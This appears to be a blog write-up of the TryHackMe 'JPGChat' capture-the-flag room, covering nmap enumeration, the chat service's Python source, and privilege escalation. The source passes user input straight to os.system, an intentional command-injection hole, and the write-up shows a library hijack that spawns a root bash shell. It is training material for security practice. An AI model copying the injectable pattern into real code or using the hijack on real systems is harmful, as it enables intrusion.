JPGChat — TryHackMe

JPGChat

Enumeration

NMAP

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.56.110 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 14:25 EST
Nmap scan report for 10.10.56.110
Host is up (0.021s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p22,3000 10.10.56.110
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 14:31 EST
Nmap scan report for 10.10.56.110
Host is up (0.025s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fe:cc:3e:20:3f:a2:f8:09:6f:2c:a3:af:fa:32:9c:94 (RSA)
| 256 e8:18:0c:ad:d0:63:5f:9d:bd:b7:84:b8:ab:7e:d1:97 (ECDSA)
|_ 256 82:1d:6b:ab:2d:04:d5:0b:7a:9b:ee:f4:64:b5:7f:64 (ED25519)
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, NULL:
| Welcome to JPChat
| source code of this service can be found at our admin's github
| MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel
|_ REPORT USAGE: use [REPORT] to report someone to the admins (with proof)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 25.52 ms 10.8.0.1
2 25.61 ms 10.10.56.110
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.61 seconds
  • SSH on Port 22 which has a relatively newer version with no know vulnerability.
  • A Service named JPChat on Port 3000. This looks interesting, so let’s explore this further.

JPChat

  • Opened JPChat on a webpage with port 3000, but was not able to interact with the service.
  • Used Burp suite to intercept the request but there was no response.
  • Finally connected with JPChat on port 3000 using netcat and was able to interact with it with option [REPORT] and got admin’s name as show below:
netcat to port 3000
#!/usr/bin/env python3

import os

print ('Welcome to JPChat')
print ('the source code of this service can be found at our admin\'s github')

def report_form():

print ('this report will be read by Mozzie-jpg')
your_name = input('your name:\n')
report_text = input('your report:\n')
os.system("bash -c 'echo %s > /opt/jpchat/logs/report.txt'" % your_name)
os.system("bash -c 'echo %s >> /opt/jpchat/logs/report.txt'" % report_text)

def chatting_service():

print ('MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel')
print ('REPORT USAGE: use [REPORT] to report someone to the admins (with proof)')
message = input('')

if message == '[REPORT]':
report_form()
if message == '[MESSAGE]':
print ('There are currently 0 other users logged in')
while True:
message2 = input('[MESSAGE]: ')
if message2 == '[REPORT]':
report_form()

chatting_service()
os cmd injection
inject reverse shell

Privilege Escalation

wes@ubuntu-xenial:~$ cat /opt/development/test_module.py
#!/usr/bin/env python3
from compare import *print(compare.Str('hello', 'hello', 'hello'))
wes@ubuntu-xenial:~$ cat compare.py 
import os
os.system("/bin/bash")

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

AWS CloudFormation to Terraform Translation

Mongo DB workshop under the guidance of world record holder Mr Vimal daga sir, organized by vimal…

Studio-App-Studious

Fragmented Communication Destroys Teams’ Performance

SHOPWARE E-COMMERCE SOLUTION FOR CONSUMER GOODS SECTOR

Out with Retrofit and in with KTor Client

Enterprise Software need to become More Human Centric

[CHAPTER 2] Discussion Points

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

HTB —Beep Writeup

Tryhackme NerdHerd Room

Tryhackme: OhMyWeb Walkthrough

HackTheBox -Starting Point: Unified(Tier 2)